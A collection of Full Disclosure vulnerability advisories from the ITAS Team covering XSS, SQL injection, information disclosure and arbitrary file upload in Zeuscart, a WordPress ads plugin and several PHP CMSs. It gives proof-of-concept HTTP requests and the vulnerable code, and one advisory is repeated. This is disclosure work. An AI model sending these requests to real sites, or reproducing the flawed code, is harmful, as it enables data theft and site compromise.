[FD] Cross-Site Scripting | Zeuscart V4
#Vulnerability: Cross-Site Scripting #Vendor: http://www.zeuscart.com #Download link: http://zeuscart.com/download/ #Affected version: Zeuscart V4 #CVSS v3.0 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N #Condition: The attack is performed by an "Anonymous User" #Payload: "-->alert(/ITASVN/) #Fix version: N/A #Author: Dang Quoc Thai thai.q.d...@itas.vn và ITAS Team ::PROOF OF CONCEPT:: + REQUEST GET /index.php?do=search&search=%22--%3E%3CScRipt%3Ealert(/ITASVN/)%3C/ScRipT%3E HTTP/1.1 Host: demo.target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.target.com/demo/ Cookie: PHPSESSID=0f9ce01d2822471dee23af07947e9074 Connection: keep-alive +RESPONSE HTTP/1.1 200 OK Date: Mon, 02 Nov 2015 02:21:55 GMT Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 X-Powered-By: PHP/5.3.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 25032 ... http://demo.target.com/index.php?do=index";>http://demo.target.com/images/logo/20151012210547_sell_logo.png"; alt="ZeusCart"> alert(/ITASVN/)" onclick="searchitem();"> Search http://demo.target.com/index.php?do=showcart";>Shopping Cart - 0 Items http://www.itas.vn/en/itas-team-found-out-a-cross-site-scripting-vulnerabili ty-in-zeuscart-cms/ - https://www.youtube.com/watch?v=CPgzAra_mXw ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Wordpress plugin Simple Ads Manager - Information Disclosure
#Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2826 #Author: Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 17 action=load_users + Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,... + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Image: http://www.itas.vn/uploads/newsother/disclosure.png + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie s-in-Hakin9-IT-Security-Magazine-78.html?language=en Best regard ---- ITAS Team (www.itas.vn) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File
Upload
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.t...@itas.vn) & ITAS Team
::PROOF OF CONCEPT::
+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: targer.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data;
boundary=---10898951822009521617421026
Content-Length: 683
-10898951822009521617421026
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php
-10898951822009521617421026
Content-Disposition: form-data; name="action"
upload_ad_image
-10898951822009521617421026-
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code: from line 303 to 314
case 'sam_ajax_upload_ad_image':
if(isset($_POST['path'])) {
$uploadDir = $_POST['path'];
$file = $uploadDir . basename($_FILES['uploadfile']['name']);
if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file ))
{
$out = array('status' => "success");
} else {
$out = array('status' => "error");
}
}
break;
+ REFERENCE:
-
http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie
s-in-Hakin9-IT-Security-Magazine-78.html?language=en
- https://www.youtube.com/watch?v=8IU9EtUTkxI
Best regard
ITAS Team (www.itas.vn)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Multiple SQL Injection
#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL
Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link:
https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h...@itas.vn) & ITAS Team
::PROOF OF CONCEPT::
---SQL INJECTION 1---
+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=sam_hits&hits%5B0%5D%5B%5D=&hits%5B1%5D%5B%5D=&hits%5B2%5D%5B%5D=&level=3
- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:
case 'sam_ajax_sam_hits':
if(isset($_POST['hits']) && is_array($_POST['hits'])) {
$hits = $_POST['hits'];
$values = '';
$remoteAddr = $_SERVER['REMOTE_ADDR'];
foreach($hits as $hit) {
$values .= ((empty($values)) ? '' : ', ')
. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
}
$sql = "INSERT INTO $sTable (id, pid, event_time,
event_type, remote_addr) VALUES {$values};";
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array('success'
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
else echo json_encode(array(
'success' => false,
'result' => $result,
'sql' => $sql,
'hits' => $hits,
'values' => $values
));
}
break;
---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=load_posts&cstr=&sp=Post&spg=Page
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :
'Post';
$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :
'Page';
//set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = "SELECT
wp.id,
wp.post_title AS title,
wp.post_type AS type
FROM
$postTable wp
WHERE
wp.post_status = 'publish' AND
FIND_IN_SET(wp.post_type, 'post,page{$custs}')
ORDER BY wp.id;";
$posts = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($posts as &$val) {
switch($val['type']) {
case 'post':
$val['type'] = $sPost;
break;
case 'page':
$val['type'] = $sPage;
break;
default:
$val['type'] = $sPost . ': '.$val['type'];
break;
}
$k++;
$val['recid'] = $k;
}
$out = array(
'status' => 'success',
'total' => count($posts),
'records' => $posts
);
break;
---SQL INJECTION 3---
+REQUEST:
POST
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm= HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.
[FD] Wordpress plugin Simple Ads Manager - SQL Injection
#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h...@itas.vn) & ITAS Team
::PROOF OF CONCEPT::
---SQL INJECTION 1---
+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=sam_hits&hits%5B0%5D%5B%5D=&hits%5B1%5D%5B%5D=&hits%5B2%5D%5B%5D=&level=3
- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:
case 'sam_ajax_sam_hits':
if(isset($_POST['hits']) && is_array($_POST['hits'])) {
$hits = $_POST['hits'];
$values = '';
$remoteAddr = $_SERVER['REMOTE_ADDR'];
foreach($hits as $hit) {
$values .= ((empty($values)) ? '' : ', ')
. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
}
$sql = "INSERT INTO $sTable (id, pid, event_time,
event_type, remote_addr) VALUES {$values};";
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array('success'
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
else echo json_encode(array(
'success' => false,
'result' => $result,
'sql' => $sql,
'hits' => $hits,
'values' => $values
));
}
break;
---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=load_posts&cstr=&sp=Post&spg=Page
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :
'Post';
$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :
'Page';
//set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = "SELECT
wp.id,
wp.post_title AS title,
wp.post_type AS type
FROM
$postTable wp
WHERE
wp.post_status = 'publish' AND
FIND_IN_SET(wp.post_type, 'post,page{$custs}')
ORDER BY wp.id;";
$posts = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($posts as &$val) {
switch($val['type']) {
case 'post':
$val['type'] = $sPost;
break;
case 'page':
$val['type'] = $sPage;
break;
default:
$val['type'] = $sPost . ': '.$val['type'];
break;
}
$k++;
$val['recid'] = $k;
}
$out = array(
'status' => 'success',
'total' => count($posts),
'records' => $posts
);
break;
---SQL INJECTION 3---
+REQUEST:
POST
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm= HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.89187
[FD] Community Gallery - Srored Corss-Site Scripting vulnerability
#Vulnerability title: Community Gallery - Srored Corss-Site Scripting
vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link:
https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
POST
/7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512
d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
Content-Length: 1300
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3;
__cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&obje
ctIDs%5B%5D=7¶meters%5Bdata%5D%5B7%5D%5BalbumID%5D=1¶meters%5Bdata%5
D%5B7%5D%5BcategoryIDs%5D%5B%5D=3¶meters%5Bdata%5D%5B7%5D%5Bdescription%
5D=test¶meters%5Bdata%5D%5B7%5D%5BenableComments%5D=1¶meters%5Bdata%
5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg¶meters%5Bdata%5D%5B7%5D%5Bfilesize%5
D=47948¶meters%5Bdata%5D%5B7%5D%5Bheight%5D=480¶meters%5Bdata%5D%5B7
%5D%5BimageID%5D=7¶meters%5Bdata%5D%5B7%5D%5Blatitude%5D=0¶meters%5B
data%5D%5B7%5D%5Blongitude%5D=0¶meters%5Bdata%5D%5B7%5D%5Borientation%5D
=1¶meters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing¶meters%5Bdata%5D%
5B7%5D%5BthumbnailHeight%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5
D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0¶meters%5Bdata%5D%5B7%5
D%5BthumbnailY%5D=0¶meters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fde
mo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&
parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%
3E¶meters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788
bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg¶meters%5Bdata%5D%5B7%5
D%5Bwidth%5D=640¶meters%5Bdata%5D%5B7%5D%5Blocation%5D=¶meters%5BisE
dit%5D=1
- Vulnerable parameter: parameters[data][7][title]
::DISCLOSURE::
+ 12/10/2014: Detect vulnerability
+ 12/10/2014: Send the detail vulnerability to vendor
+ 03/11/2015: Public information
::REFERENCE::
-
http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-bu
rning-board-community-gallery-77.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
----
ITAS Team (itas.t...@itas.vn)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ProjectSend r561 - SQL injection vulnerability
#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/download/67/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n...@itas.vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
GET /projectsend/users-edit.php?id= HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456;
PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
Connection: keep-alive
- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code:
if (isset($_GET['id'])) {
$client_id = mysql_real_escape_string($_GET['id']);
/**
* Check if the id corresponds to a real client.
* Return 1 if true, 2 if false.
**/
$page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
/**
* Return 0 if the id is not set.
*/
$page_status = 0;
}
/**
* Get the clients information from the database to use on the form.
*/
if ($page_status === 1) {
$editing = $database->query("SELECT * FROM tbl_users WHERE
id=$client_id");
while($data = mysql_fetch_array($editing)) {
$add_client_data_name = $data['name'];
$add_client_data_user = $data['user'];
$add_client_data_email = $data['email'];
$add_client_data_addr = $data['address'];
$add_client_data_phone = $data['phone'];
$add_client_data_intcont = $data['contact'];
if ($data['notify'] == 1) { $add_client_data_notity = 1; }
else { $add_client_data_notity = 0; }
if ($data['active'] == 1) { $add_client_data_active = 1; }
else { $add_client_data_active = 0; }
}
}
::DISCLOSURE::
+ 01/06/2015: Detect vulnerability
+ 01/07/2015: Contact to vendor
+ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
+ 03/05/2015: Public information
::REFERENCE::
-
http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in
-projectsend-r561-76.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
Best Regards,
-
ITAS Team (www.itas.vn)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Radexscript CMS 2.2.0 - SQL Injection vulnerability
#Vulnerability title: Radexscript CMS 2.2.0 - SQL Injection vulnerability
#Vendor: http://redaxscript.com/
#Product: Radexscript CMS
#Software link: http://redaxscript.com/download/releases
#Affected version: Redaxscript 2.2.0
#Fixed version: Redaxscript 2.3.0
#CVE ID: CVE-2015-1518
#Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)
:: PROOF OF CONCEPT ::
POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872;
GEAR=local-5422433b500446ead50002d4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
search_terms=[SQL INJECTION
HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_pos
t=Search
- Vulnerable parameter: $search_terms
- Vulnerable file: redaxscript/includes/search.php
- Vulnerable function: search_post()
- Vulnerable code:
function search_post()
{
/* clean post */
if (ATTACK_BLOCKED < 10)
{
$search_terms = clean($_POST['search_terms'], 5);
}
/* validate post */
if (strlen($search_terms) < 3 || $search_terms == l('search_terms'))
{
$error = l('input_incorrect');
}
/* query results */
else
{
$search = array_filter(explode(' ', $search_terms));
$search_keys = array_keys($search);
$last = end($search_keys);
/* query search */
$query = 'SELECT id, title, alias, description, date,
category, access FROM ' . PREFIX . 'articles WHERE (language = \'' .
Redaxscript\Registry::get('language') . '\' || language = \'\') && status =
1';
if ($search)
{
$query .= ' && (';
foreach ($search as $key => $value)
{
$query .= 'title LIKE \'%' . $value . '%\'
|| description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value .
'%\' || text LIKE \'%' . $value . '%\'';
if ($last != $key)
{
$query .= ' || ';
}
}
$query .= ')';
}
$query .= ' ORDER BY date DESC LIMIT 50';
$result =
Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray();
$num_rows = count($result);
if ($result == '' || $num_rows == '')
{
$error = l('search_no');
}
/* collect output */
else if ($result)
{
$accessValidator = new
Redaxscript\Validator\Access();
$output = '' . l('search') . '';
$output .= form_element('fieldset', '',
'set_search_result', '', '', '' . l('articles') . '') . '';
foreach ($result as $r)
{
$access = $r['access'];
/* if access granted */
if ($accessValidator->validate($access,
MY_GROUPS) === Redaxscript\Validator\Validator::PASSED)
{
if ($r)
{
foreach ($r as $key =>
$value)
{
$$key =
stripslashes($value);
}
}
/* prepare metadata */
if ($description == '')
{
$description = $title;
}
$date = date(s('date'),
strtotime($date));
/* build route */
if ($category == 0)
[FD] Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities
# Exploit Title:Sefrengo CMS v1.6.1 - Multiple SQL Injection
Vulnerabilities
# Vendor: http://www.sefrengo.org/
# Download link:http://forum.sefrengo.org/index.php?showtopic=3368 (
https://github.com/sefrengo-cms/sefrengo-1.x/tree/22c0d16bfd715631ed317cc990785ccede478f07
)
# CVE ID: CVE-2015-1428
# Vulnerability:SQL Injection
# Affected version: Sefrengo CMS v1.6.1
# Fixed version:Sefrengo CMS v1.6.2
# Author:Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team (
www.itas.vn)
::PROOF OF CONCEPT::
Link 1:
- Vulnerable file: /backend/external/phplib/ct_sql.inc
- Vulnerable function: function ac_get_value($id, $name)
- Vulnerable parameter: $id
- Vulnerable code:
function ac_get_value($id, $name) {
global $cms_db;
$this->db->query(sprintf("select val from %s where sid = '%s' and name
= '%s'",
$cms_db['sessions'],
$id,
addslashes($name)));
if ($this->db->next_record()) {
$str = $this->db->f("val");
$str2 = base64_decode( $str );
if ( ereg("^".$name.":.*", $str2) ) {
$str = ereg_replace("^".$name.":", "", $str2 );
} else {
$str3 = stripslashes( $str );
if ( ereg("^".$name.":.*", $str3) ) {
$str = ereg_replace("^".$name.":", "", $str3 );
} else {
switch ( $this->encoding_mode ) {
case "slashes":
$str = stripslashes($str);
break;
case "base64":
default:
$str = base64_decode($str);
}
}
};
return $str;
};
return "";
}
Link 2:
- Vulnerable file: /backend/inc/class.values_ct.php
- Vulnerable function: function set_value($mixed)
- Vulnerable parameter: $mixed['id']
- Vulnerable code:
function set_value($mixed)
{
global $cms_db, $db;
//build query
$sql_group = (empty($mixed['group'])) ? 0: ''.$mixed['group'];
$sql_client = (empty($mixed['client'])) ? '': 'AND idclient IN ('.
$mixed['client'] .')';
$sql_lang = (empty($mixed['lang'])) ? '': 'AND idlang IN ('.
$mixed['lang'] .')';
$sql_key = (empty($mixed['key'])) ? '': 'AND V.key1 = "'.
$mixed['key'] . '" ';
$sql_key2 = (empty($mixed['key2'])) ? '': 'AND V.key2 = "'.
$mixed['key2'] . '" ';
$sql_key3 = (empty($mixed['key3'])) ? '': 'AND V.key3 = "'.
$mixed['key3'] . '" ';
$sql_key4 = (empty($mixed['key4'])) ? '': 'AND V.key4 = "'.
$mixed['key4'] . '" ';
$sql_id = (empty($mixed['id'])) ? "": "AND V.idvalues = '".
$mixed['id'] . "' ";
$sql = "SELECT *
FROM". $cms_db['values'] ." AS V
WHEREV.group_name IN ('$sql_group')
$sql_client $sql_lang
$sql_key $sql_key2 $sql_key3 $sql_key4 $sql_id";
//die($sql);
$db -> query($sql);
$count_rows = $db ->num_rows();
if($count_rows > 1){
echo $sql .' Fehler in Klasse "cms_value_ct". Es wurde
mehr als ein Ergebnis gefunden. Anfrage ist nicht eindeutig';
exit;
}
elseif($count_rows == 1){
$db -> next_record();
$mixed['id'] = $db -> f('idvalues');
//echo "update";
$this -> _update_by_id($mixed);
}
else{
$this -> insert($mixed);
}
}
::DISCLOSURE::
+ 01/08/2015: Send the detail of vulnerabilities to vendor and Vendor
confirmed
+ 01/25/2015: Vendor releases patch
+ 01/26/2015: ITAS Team publishes information
::REFERENCE::
- Detail and videos:
http://www.itas.vn/news/itas-team-found-out-multiple-sql-injection-vulnerabilities-in-sefrengo-cms-v1-6-1-74.html
-
https://github.com/sefrengo-cms/sefrengo-1.x/commit/22c0d16bfd715631ed317cc990785ccede478f07
::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is
hereby granted for the electronic redistribution of this information. It is
not to be edited or altered in any way without the express written consent
of ITAS CORP.
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY
APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE
ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
=
ITAS Team (www.itas.vn)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection Vulnerability in Microweber 0.95
# Exploit Title: SQL Injection Vulnerability in Microweber 0.95
# Vendor: https://microweber.com/
# Download link: https://microweber.com/download
(https://github.com/microweber/microweber)
# CVE ID: CVE-2014-9464
# Vulnerability: SQL Injection
# Affected version: Version 0.95 before 12/09/2014.
# Fixed version:Version 0.95 updated on 12/11/2014
# Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS
Team (www.itas.vn)
::VULNERABILITY DETAIL::
- A SQL injection vulnerability has been found and confirmed within the
Microweber CMS as an anonymous user. A successful attack could allow an
anonymous attacker to access information such as username and password
hashes, or other private information that are stored in the database. The
following URL and parameter have been confirmed to suffer from SQL
injection.
- Attack vector:
GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53;
PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive
- Vulnerable file: microweber-master/src/Microweber/Category.php
- Vulnerable function: get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)
- Vulnerable parameter: $parent_id
- Vulnerable code:
public function get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)
{
$categories_id = intval($parent_id);
$cache_group = 'categories/' . $categories_id;
$table = $this->tables['categories'];
$db_t_content = $this->tables['content'];
if (isset($orderby) == false) {
$orderby = array();
//$orderby[0] = 'updated_on';
//$orderby[1] = 'DESC';
$orderby[0] = 'position';
$orderby[1] = 'asc';
}
if (intval($parent_id) == 0) {
return false;
}
$data = array();
$data['parent_id'] = $parent_id;
if ($type != FALSE) {
$data['data_type'] = $type;
} else {
$type = 'category_item';
$data['data_type'] = $type;
}
$cache_group = 'categories/' . $parent_id;
$q = " SELECT id, parent_id FROM $table WHERE parent_id=$parent_id
";
$q_cache_id = __FUNCTION__ . crc32($q);
$save = $this->app->db->query($q, $q_cache_id, $cache_group);
if (empty($save)) {
return false;
}
$to_return = array();
if (is_array($save) and !empty($save)) {
foreach ($save as $item) {
$to_return[] = $item['id'];
